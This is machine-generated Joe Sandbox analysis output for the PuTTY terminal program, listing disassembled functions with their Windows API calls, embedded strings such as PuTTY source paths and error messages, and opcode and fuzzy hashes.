                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Object$CompatibleCreateDeleteErrorLast$AddressBitmapBitsCurrentFormatLibraryLoadMessageProcReleaseSelect
                                                          • String ID: $'%s': unable to open file$($6$BM$BitBlt: %s$CreateCompatibleBitmap: %s$CreateCompatibleDC(desktop window dc): %s$DwmGetWindowAttribute$GetDC(window): %s$GetDIBits (get data): %s$SelectObject: %s$dwmapi.dll
                                                          • API String ID: 2770305857-4119329088
                                                          • Opcode ID: 66009171b8ddf3f40cc6adc9ed46b64b1968a371c64608e07f2d62e374d6f9c7
                                                          • Instruction ID: c0c928eb7bdcce33f91947f255e3a1fb80994d26118abc5d3961f0fd42255a62
                                                          • Opcode Fuzzy Hash: 66009171b8ddf3f40cc6adc9ed46b64b1968a371c64608e07f2d62e374d6f9c7
                                                          • Instruction Fuzzy Hash: B8A1D763B0A68366EA60BB61E454B7AE391BF85780FC44134DD4D03B55EE3EF404A729
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Palette$Select$Object$RealizeReleaseStock$CapsCreateDeviceEntriesUnrealize_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$ncolours <= OSC4_NCOLOURS - start$start <= OSC4_NCOLOURS$wgs->term_hwnd
                                                          • API String ID: 997932918-688117120
                                                          • Opcode ID: 92ab84d565a3616a767931b78e6543aa297af0af69523eca760ae4022152b28b
                                                          • Instruction ID: 2c6fc005d7865a3dbb1c3c8779b8da976613ba2b1d5a66c09222978962aa369f
                                                          • Opcode Fuzzy Hash: 92ab84d565a3616a767931b78e6543aa297af0af69523eca760ae4022152b28b
                                                          • Instruction Fuzzy Hash: 84812763A0A24292FB64A726E4407BAE791FF46B90F984131CE4E43391DF7FE451E324
                                                          APIs
                                                          Strings
                                                          • /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/network.c, xrefs: 00007FF738A6BA23
                                                          • sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses, xrefs: 00007FF738A6BA1C
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: setsockopt$AsyncHandleInformationSelectclosesocketsocket
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/network.c$sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses
                                                          • API String ID: 221583175-4029205030
                                                          • Opcode ID: 40a4441d638311c04731603ebb3c7f41888fc7ce709856e8b91c67f497efdf7d
                                                          • Instruction ID: 4cb7bf537c0cf75632b5a4872ae715b4d72e854af2d73520894ca55e635efc60
                                                          • Opcode Fuzzy Hash: 40a4441d638311c04731603ebb3c7f41888fc7ce709856e8b91c67f497efdf7d
                                                          • Instruction Fuzzy Hash: E4E1A07360968297EB60AF25E044B6AF3A0FB84B54F804235DB8E43B99DF3EE445D714
                                                          APIs
                                                          Strings
                                                          • /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/network.c, xrefs: 00007FF738A6BFF2
                                                          • false && "bad address family in sk_newlistener_internal", xrefs: 00007FF738A6BFEB
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: closesocket$ErrorLast$HandleInformationbindgetaddrinfohtonslistensetsockoptsocket
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/network.c$false && "bad address family in sk_newlistener_internal"
                                                          • API String ID: 2773167020-2570758398
                                                          • Opcode ID: 07b0fe020befb43f80ee91646e6614c7a1c01ec91f48ef4b9e5d20a540a4085e
                                                          • Instruction ID: 1d3acc2cf68c866232c67b7e0077792d80eabd00355765ab38a3b4667e37c94f
                                                          • Opcode Fuzzy Hash: 07b0fe020befb43f80ee91646e6614c7a1c01ec91f48ef4b9e5d20a540a4085e
                                                          • Instruction Fuzzy Hash: D5B1E523A0974292EB60AB11A40077AE3A1FF85B90F904235DB9E037E9DF7FE4459719
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Menu$DeleteInsert$AppendCreatePopup
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$IDM_SPECIAL_MIN + 0x10 * i < IDM_SPECIAL_MAX$S&pecial Command$nesting < 2
                                                          • API String ID: 1803796953-2454782107
                                                          • Opcode ID: 7a7983d97ad1ae08afb4cb975645954fe395e8b189463a545bd29cec1b93c837
                                                          • Instruction ID: 9c9e000af62aad5934885bac70a9d3184c205ba802c132956b7efb7425a0e421
                                                          • Opcode Fuzzy Hash: 7a7983d97ad1ae08afb4cb975645954fe395e8b189463a545bd29cec1b93c837
                                                          • Instruction Fuzzy Hash: F551E122B06666A1E790AB16E954F7AE359EF85BD4F804032DD0D03B90DF3FD841D714
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: RectWindow$Dialog$MessageSend$CreateItemShow
                                                          • String ID: EDIT$STATIC
                                                          • API String ID: 2330346805-43825268
                                                          • Opcode ID: ba58d56f40ec5378fdec2c0a46fc70ca0ab38913529ac42da718d87cc61d687d
                                                          • Instruction ID: 30417b3c98559a38959f6193b55c773c320319eb5dbc06a3a68bdf59de136573
                                                          • Opcode Fuzzy Hash: ba58d56f40ec5378fdec2c0a46fc70ca0ab38913529ac42da718d87cc61d687d
                                                          • Instruction Fuzzy Hash: DDA199B26097818AE760DB16E8407ABF7A1FBC9B84F504126DACC47B58CF7DD485DB04
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo$Module$FileHandleName
                                                          • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program:
                                                          • API String ID: 3031022502-1508414584
                                                          • Opcode ID: 09570fa23ba68efb34941cd3d8c30a62326323ae61197180eaa9df0580fc6c1e
                                                          • Instruction ID: 43e6fbf0684ff8852c61881cdf9ecf852fe4b17c5643b49a5cc8bcc8740ccd35
                                                          • Opcode Fuzzy Hash: 09570fa23ba68efb34941cd3d8c30a62326323ae61197180eaa9df0580fc6c1e
                                                          • Instruction Fuzzy Hash: 9BC1D693A0A34360FB20BB21AD00AFAD355AF11FC4FD04132CD4D56795EE7EF405A2AA
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CaptureCursorKeyboardMessageState$InfoLongMonitorReleaseSendShowTimeWindowZoomed
                                                          • String ID: (
                                                          • API String ID: 760066194-3887548279
                                                          • Opcode ID: b5e9ed695f54e348cec1fadcc705fd6205682a23e88342c596d13b3f2d747d95
                                                          • Instruction ID: 81bee4fdf2119f8f4583e19f069d560cd5024a40386a2fa0d19123aa00d61e65
                                                          • Opcode Fuzzy Hash: b5e9ed695f54e348cec1fadcc705fd6205682a23e88342c596d13b3f2d747d95
                                                          • Instruction Fuzzy Hash: 55D12637A0E29692F7B0AA34D144F7EF694EB84741F940035DA4A83685CFBFE841E725
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Message$ItemSend$Window$ActiveBeepDestroyParentText
                                                          • String ID: %s Event Log
                                                          • API String ID: 1719468517-583241876
                                                          • Opcode ID: 700aeceea86c887274534bda84a76a58b4ed24eb6991e2b78f36445ccac973fa
                                                          • Instruction ID: 7b209ea287a6acbc8f89c00a530d0110d7791f06b2a0326c34da8eb3865f0e13
                                                          • Opcode Fuzzy Hash: 700aeceea86c887274534bda84a76a58b4ed24eb6991e2b78f36445ccac973fa
                                                          • Instruction Fuzzy Hash: C09105B3B09603A6FB50BB21E950B79E790BB48B84F840235DD4D07B94DE3EE5849329
                                                          Similarity
                                                          • API ID: htonl$HandleInformationIoctlsocket
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/network.c$addr->addresses && step.curraddr < addr->naddresses$family == AF_UNSPEC
                                                          • API String ID: 156137457-2999384216
                                                          • Opcode ID: 55ac0c43cb6975455ce41a4fc862a4a323b8c1e5ebe4552c55d28620bd849686
                                                          • Instruction ID: 78f31eef9ff2cc2cdcc8fbb9cbb2cf60b43f128857090cfa0114ba2b7bc34637
                                                          • Opcode Fuzzy Hash: 55ac0c43cb6975455ce41a4fc862a4a323b8c1e5ebe4552c55d28620bd849686
                                                          • Instruction Fuzzy Hash: 7A810663B1960262FB60AB14D490B3AE7E0FF84750F858635DA2D437D4EF3EE8429318
                                                          Similarity
                                                          • API ID: DescriptorInitializeLocalSecurity$AllocateErrorFreeLast$AllocDaclOwner
                                                          • String ID: unable to allocate security descriptor: %s$unable to construct ACL: %s$unable to initialise security descriptor: %s$unable to set DACL in security descriptor: %s$unable to set owner in security descriptor: %s
                                                          • API String ID: 436594416-3066058096
                                                          • Opcode ID: 7cc0ad5134c731096eebbb189701258c81b8dbdaf4c70c06e0ae7ed183ae16af
                                                          • Instruction ID: eba4123d9b8a73cd6d6158d062ec650cdbfce102d5e517cfbf26d59169a7be6e
                                                          • Opcode Fuzzy Hash: 7cc0ad5134c731096eebbb189701258c81b8dbdaf4c70c06e0ae7ed183ae16af
                                                          • Instruction Fuzzy Hash: 20518C72A09A82A1FB20AF19E4557AAF3A0EFC5740F804131EA8D07790DF7FD445AB59
                                                          APIs
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                          • GetProcAddress.KERNEL32 ref: 00007FF738A698A3
                                                            • Part of subcall function 00007FF738A69F80: CreateFileA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF738A69A4B), ref: 00007FF738A69FCD
                                                          • GetEnvironmentVariableA.KERNEL32 ref: 00007FF738A69995
                                                          • GetEnvironmentVariableA.KERNEL32 ref: 00007FF738A699AB
                                                          • GetWindowsDirectoryA.KERNEL32 ref: 00007FF738A69A15
                                                            • Part of subcall function 00007FF738A72FD0: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000001,00007FFE21E98EC0,00007FF738A69836), ref: 00007FF738A7300D
                                                            • Part of subcall function 00007FF738A72FD0: RegQueryValueExA.ADVAPI32 ref: 00007FF738A73054
                                                          Similarity
                                                          • API ID: CreateEnvironmentQueryValueVariable$AddressCloseDirectoryFileProcWindows
                                                          • String ID: HOMEDRIVE$HOMEPATH$RandSeedFile$SHGetFolderPathA$Software\SimonTatham\PuTTY$\PUTTY.RND$shell32.dll
                                                          • API String ID: 901926110-1528239033
                                                          • Opcode ID: 7d6d0d4450fc666840ba003d4b79b1a9fee8b32739d161a2738d5b702f6a9813
                                                          • Instruction ID: 6cf725926d9a83d28c9bbb70fed12ff19b0449d070587810bf79c5480551bd2a
                                                          • Opcode Fuzzy Hash: 7d6d0d4450fc666840ba003d4b79b1a9fee8b32739d161a2738d5b702f6a9813
                                                          • Instruction Fuzzy Hash: 4561C163B0E65361FA60B715A410BEAE3809F88794FC80131D94D47BDDEE7EE506E368
                                                          Similarity
                                                          • API ID: File$Create$CloseCurrentDeleteErrorHandleLastPathProcessTempWrite
                                                          • String ID: %s::/%s.html>main$%s\putty_%lu_%llu.chm
                                                          • API String ID: 4085685679-1808412575
                                                          • Opcode ID: 26fb5b42aec2366dbaac9cef9246eadaa424f77e8e3f4b137e6446720c3c2745
                                                          • Instruction ID: 7d582718e953b0bd152563e620b3c793072d3ecae00ee6adf9195f860d4a550c
                                                          • Opcode Fuzzy Hash: 26fb5b42aec2366dbaac9cef9246eadaa424f77e8e3f4b137e6446720c3c2745
                                                          • Instruction Fuzzy Hash: 8A51D063A09643A5F610BB11F824B7AE760BB45BA4F845234DD5D03BC4CF7FE808A729
                                                          Similarity
                                                          • API ID: Object$Select$Create$DeleteLineMovePixelPolyline
                                                          • String ID:
                                                          • API String ID: 1020918164-0
                                                          • Opcode ID: ed2fa4786f405fbc84ded08fa9590d7d4109b6d49484d423a3de042f7789e337
                                                          • Instruction ID: 3679af242d3d0a9838f1bc4aee213dd106ac67208490258ddd492590e109b984
                                                          • Opcode Fuzzy Hash: ed2fa4786f405fbc84ded08fa9590d7d4109b6d49484d423a3de042f7789e337
                                                          • Instruction Fuzzy Hash: A6710733A1929646E754DF16E444B7AF7A8FB88B90F84013AEE0D43784DF7EE8419B04
                                                          Similarity
                                                          • API ID: RectWindowZoomed$ClientDesktopInfoInvalidateMonitor
                                                          • String ID: (
                                                          • API String ID: 3999421749-3887548279
                                                          • Opcode ID: 0409b4766def004f54faaaf23440837edeb77d12e507eaf40d0bd92904261e46
                                                          • Instruction ID: da2de684239fd703db5e16519e8cd721fc60667a527aced3820a7cf38a653d64
                                                          • Opcode Fuzzy Hash: 0409b4766def004f54faaaf23440837edeb77d12e507eaf40d0bd92904261e46
                                                          • Instruction Fuzzy Hash: B251CE63A0E64296FB24EB29E451B7AF3A0FB85740F880031DE4E43791DF7EE845D624
                                                          Similarity
                                                          • API ID: Create$ErrorEventFormatLastMessageNamedPipe_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/named-pipe-server.c$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0$unable to create named pipe '%s': %s
                                                          • API String ID: 3886136549-228966084
                                                          • Opcode ID: 2261427d2f6ee5233f72e83b6bd3cc082a74e4a875b275ed17d9b8f59572a44b
                                                          • Instruction ID: 258c0e31f86b97ed822c958a823c83949a7b74684a89c99bfc97f24f5476a090
                                                          • Opcode Fuzzy Hash: 2261427d2f6ee5233f72e83b6bd3cc082a74e4a875b275ed17d9b8f59572a44b
                                                          • Instruction Fuzzy Hash: 8751C133A09B42A2FB00AB11E5517BAF3A0FF45794F804135EA8C07B91EF3EE1659354
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A73DC8), ref: 00007FF738A73C9D
                                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A73DC8), ref: 00007FF738A73D0B
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A73DC8), ref: 00007FF738A73D15
                                                            • Part of subcall function 00007FF738A73820: GetCurrentProcessId.KERNEL32 ref: 00007FF738A73860
                                                            • Part of subcall function 00007FF738A73820: OpenProcess.KERNEL32 ref: 00007FF738A73872
                                                            • Part of subcall function 00007FF738A73820: GetLastError.KERNEL32 ref: 00007FF738A738C3
                                                            • Part of subcall function 00007FF738A73820: LocalAlloc.KERNEL32 ref: 00007FF738A738E8
                                                            • Part of subcall function 00007FF738A73820: GetLengthSid.ADVAPI32 ref: 00007FF738A7391A
                                                            • Part of subcall function 00007FF738A73820: CopySid.ADVAPI32 ref: 00007FF738A7393E
                                                            • Part of subcall function 00007FF738A73820: CloseHandle.KERNEL32 ref: 00007FF738A73964
                                                            • Part of subcall function 00007FF738A73820: CloseHandle.KERNEL32 ref: 00007FF738A73974
                                                            • Part of subcall function 00007FF738A73820: LocalFree.KERNEL32 ref: 00007FF738A73982
                                                          • GetLastError.KERNEL32 ref: 00007FF738A73D2B
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A73DC8), ref: 00007FF738A73D41
                                                            • Part of subcall function 00007FF738A74050: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF738A69A4B), ref: 00007FF738A740FB
                                                          Similarity
                                                          • API ID: ErrorLast$AllocateCloseHandleInitializeLocalProcess$AllocCopyCurrentFormatFreeLengthMessageOpen
                                                          • String ID: unable to construct SID for current user: %s$unable to construct SID for local same-user access only: %s$unable to construct SID for world: %s
                                                          • API String ID: 742050092-2222155745
                                                          • Opcode ID: 9606dc5468eceea1dd2b615bbe117ef4981d4f51b496b5841ee8758abb641360
                                                          • Instruction ID: d25af528d50d1255814c0ba2f9eeca8c6b2713270075fbf0a82f74542aac0644
                                                          • Opcode Fuzzy Hash: 9606dc5468eceea1dd2b615bbe117ef4981d4f51b496b5841ee8758abb641360
                                                          • Instruction Fuzzy Hash: 08418D73909642A6FB10AF60E45473AF7A0FB84304FD00139E68D46BA5DF7EE444EB29
                                                          Similarity
                                                          • API ID: LongWindow
                                                          • String ID:
                                                          • API String ID: 1378638983-0
                                                          • Opcode ID: a64ef1ec528369584318b8163b0d0a72cfe950b3ed308f140b1cd266a3ac9cf3
                                                          • Instruction ID: ec37050edfce01fc3f287490345be7edebf23cd2775501bb574450643f661cac
                                                          • Opcode Fuzzy Hash: a64ef1ec528369584318b8163b0d0a72cfe950b3ed308f140b1cd266a3ac9cf3
                                                          • Instruction Fuzzy Hash: EFC10273A0A296A6EB60AB25D444BBEE394EF84740F940135EA0D83791DF7FE841E714
                                                          Similarity
                                                          • API ID: CloseHandleLocalProcess$AllocCopyCurrentErrorFreeLastLengthOpen
                                                          • String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: Pageant.exe$Recent Sessions
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID:
                                                          APIs
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                            • Part of subcall function 00007FF738A72FD0: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000001,00007FFE21E98EC0,00007FF738A69836), ref: 00007FF738A7300D
                                                            • Part of subcall function 00007FF738A72FD0: RegQueryValueExA.ADVAPI32 ref: 00007FF738A73054
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A68F42
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A68F83
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A6918F
                                                            • Part of subcall function 00007FF738A730C0: RegSetValueExA.ADVAPI32 ref: 00007FF738A730F3
                                                          Similarity
                                                          • API ID: Close$Value$Query$Create
                                                          • String ID: %s@%d:$Software\SimonTatham\PuTTY\SshHostKeys$rsa
                                                          Similarity
                                                          • API ID: ChooseColor
                                                          • String ID: !c->data$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$All Files (*.*)
                                                          APIs
                                                            • Part of subcall function 00007FF738B019C8: GetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019D7
                                                            • Part of subcall function 00007FF738B019C8: FlsGetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019EC
                                                            • Part of subcall function 00007FF738B019C8: SetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A77
                                                            • Part of subcall function 00007FF738B019C8: FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A0D
                                                          • GetUserDefaultLCID.KERNEL32(00000000,00000092,?,?), ref: 00007FF738B081B4
                                                            • Part of subcall function 00007FF738B019C8: FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A3A
                                                            • Part of subcall function 00007FF738B019C8: FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A4B
                                                            • Part of subcall function 00007FF738B019C8: FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A5C
                                                          • EnumSystemLocalesW.KERNEL32(00000000,00000092,?,?,00000000,?,?,00007FF738AF7139), ref: 00007FF738B0819B
                                                          • ProcessCodePage.LIBCMT ref: 00007FF738B081DE
                                                          • IsValidCodePage.KERNEL32 ref: 00007FF738B081F0
                                                          • IsValidLocale.KERNEL32 ref: 00007FF738B08206
                                                          • GetLocaleInfoW.KERNEL32 ref: 00007FF738B08262
                                                          • GetLocaleInfoW.KERNEL32 ref: 00007FF738B0827E
                                                          Similarity
                                                          • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                          • String ID:
                                                          Similarity
                                                          • API ID: Find$File$CloseCurrentDirectoryFirstNextProcessWindows
                                                          • String ID: \*
                                                          Similarity
                                                          • API ID: AddressCloseFileFindFirstHandleProc
                                                          • String ID: GetFileAttributesExW$P$kernel32.dll
                                                          Similarity
                                                          • API ID: Object$CreateDeleteFontMetricsReleaseSelectText
                                                          • String ID:
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          Similarity
                                                          • API ID: memcpy_s
                                                          • String ID: $MZx
                                                          Similarity
                                                          • API ID: ClipboardGlobal$AllocDataEmptyLockOpenUnlock
                                                          • String ID:
                                                          • API String ID: 2715784024-0
                                                          • Opcode ID: f65d7b619d670f9def71b8ccb8791a53fa415f51f2e79dfe868a62d8489b4d43
                                                          • Instruction ID: 61fb2bce3bcfebf4f5ef43227054c13ff9be7aee57398306a64f2e0d226917e9
                                                          • Opcode Fuzzy Hash: f65d7b619d670f9def71b8ccb8791a53fa415f51f2e79dfe868a62d8489b4d43
                                                          • Instruction Fuzzy Hash: 6411A353B0B113A1FB96AB52BD44678D391AF46BE2F444135CD0D06790EE3E68CBA225
                                                          APIs
                                                          • _get_daylight.LIBCMT ref: 00007FF738B157F2
                                                            • Part of subcall function 00007FF738B1567C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF738B15690
                                                          • _get_daylight.LIBCMT ref: 00007FF738B15814
                                                            • Part of subcall function 00007FF738B1564C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF738B15660
                                                            • Part of subcall function 00007FF738B02E14: HeapFree.KERNEL32(?,?,?,00007FF738B06CB2,?,?,?,00007FF738B06873,?,?,00000000,00007FF738B07544,?,?,?,00007FF738B0744F), ref: 00007FF738B02E2A
                                                            • Part of subcall function 00007FF738B02E14: GetLastError.KERNEL32(?,?,?,00007FF738B06CB2,?,?,?,00007FF738B06873,?,?,00000000,00007FF738B07544,?,?,?,00007FF738B0744F), ref: 00007FF738B02E34
                                                          • GetTimeZoneInformation.KERNEL32(?,?,00000000,00000000,?,00007FF738B15D20), ref: 00007FF738B1583B
                                                          • _get_daylight.LIBCMT ref: 00007FF738B15803
                                                            • Part of subcall function 00007FF738B1561C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF738B15630
                                                          Strings
                                                          Similarity
                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                          • String ID: ?
                                                          • API String ID: 3458911817-1684325040
                                                          • Opcode ID: 2b6b4a963b51cb6709a98ac0e75c519885e7eed0e61c83a05d89b95f896a1079
                                                          • Instruction ID: 6a2bfe57b5c18e2cc83aa4e605b9439cf71f9cb9bd3bab6552faceda92c9604d
                                                          • Opcode Fuzzy Hash: 2b6b4a963b51cb6709a98ac0e75c519885e7eed0e61c83a05d89b95f896a1079
                                                          • Instruction Fuzzy Hash: EA41B473A08643A6E710FF36D8804A9F762BB98384F804135EA4D47796DF3EF401A769
                                                          APIs
                                                          Similarity
                                                          • API ID: Item$MessageSend$ChooseColorText
                                                          • String ID:
                                                          • API String ID: 2403525919-0
                                                          • Opcode ID: 8fe9ce5eceecc9f7bdc44b4e3153c9592783cfd2ff9f987fc3dcb28a15ba7c29
                                                          • Instruction ID: 412f6b6b0fc198193d41987cc0b8c2e7b2c605a016a0fc3f0992f57f6601d0ba
                                                          • Opcode Fuzzy Hash: 8fe9ce5eceecc9f7bdc44b4e3153c9592783cfd2ff9f987fc3dcb28a15ba7c29
                                                          • Instruction Fuzzy Hash: 9C71C8B3A0964699E764EB15E44077AE7A0FB45B84F845235DF8D03B45CF3EE880E364
                                                          APIs
                                                          Similarity
                                                          • API ID: Create$Event$CloseCriticalHandleInitializeSectionThread
                                                          • String ID:
                                                          • API String ID: 2660700835-0
                                                          • Opcode ID: 7060ef1db19765c15ecb51764c18f4acb629c402f03a042797fbfc53073bf9f0
                                                          • Instruction ID: 98c79edd97168dbaaf4651d9b6817388271225403e78bfd8f13664bd535ed174
                                                          • Opcode Fuzzy Hash: 7060ef1db19765c15ecb51764c18f4acb629c402f03a042797fbfc53073bf9f0
                                                          • Instruction Fuzzy Hash: 6931D073A15A02A6F714EB21F850B66F3A0FB49750FC48235DA8E06BA0DF3EE444D714
                                                          APIs
                                                          Similarity
                                                          • API ID: Create$Event$CloseCriticalHandleInitializeSectionThread
                                                          • String ID:
                                                          • API String ID: 2660700835-0
                                                          • Opcode ID: 7fe7e6c4e41e634ff9d831d6de080e10820e0ba925a2b53643a80e04d0fe4817
                                                          • Instruction ID: 395d63b14c271dc334f3b287745596ef9c4fbc6bc313206409fe3bba6d17b962
                                                          • Opcode Fuzzy Hash: 7fe7e6c4e41e634ff9d831d6de080e10820e0ba925a2b53643a80e04d0fe4817
                                                          • Instruction Fuzzy Hash: 8431E173619A4256FB20EB25B810766F3A0FB49754FC44235DA8E06BA0DF3EE444D718
                                                          APIs
                                                          Similarity
                                                          • API ID: Clipboard$Data$CloseMessageOpenSend
                                                          • String ID:
                                                          • API String ID: 2111581930-0
                                                          • Opcode ID: 3ad230ff7c130997384676ac3547f4b790b6b67814630b7e8cf481d053b7648c
                                                          • Instruction ID: 27ee472dbf5c711c4c628b934b5bc714dcf6650fe500918e066427b2780e9976
                                                          • Opcode Fuzzy Hash: 3ad230ff7c130997384676ac3547f4b790b6b67814630b7e8cf481d053b7648c
                                                          • Instruction Fuzzy Hash: 40F08252B1E11363FB983B61E804774D2919F05F40F944139C90E062D0DD7FAC86A329
                                                          APIs
                                                          • FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF738A69A4B), ref: 00007FF738A740FB
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF738A69A4B), ref: 00007FF738A74124
                                                          Strings
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID: (unable to format: FormatMessage returned %u)$Error %d: %s
                                                          • API String ID: 3479602957-1777221902
                                                          • Opcode ID: 833ec2e719c5a8fa5ee69bff0c0a85f0dfc4d70319f666af26bbd7d7a4d80826
                                                          • Instruction ID: c817cbb8e79631979cad71cecc7eaaa46f53d1570736dd20c05a5aae962345f4
                                                          • Opcode Fuzzy Hash: 833ec2e719c5a8fa5ee69bff0c0a85f0dfc4d70319f666af26bbd7d7a4d80826
                                                          • Instruction Fuzzy Hash: 7A31C463A0A64366EB50FB10E4507AAE3A0FF84344F804131FA8D43B95DF3EE505AB18
                                                          APIs
                                                          Similarity
                                                          • API ID: Color$ModeObjectSelectText
                                                          • String ID:
                                                          • API String ID: 3594386986-0
                                                          • Opcode ID: 908287c952c19077702fa72e75881eff9a37e9d8844351ad772059503a0a4c29
                                                          • Instruction ID: 8353a816955a0d9dc8ed805222a7813cb652f560bd600affa1af9fe08700c0fa
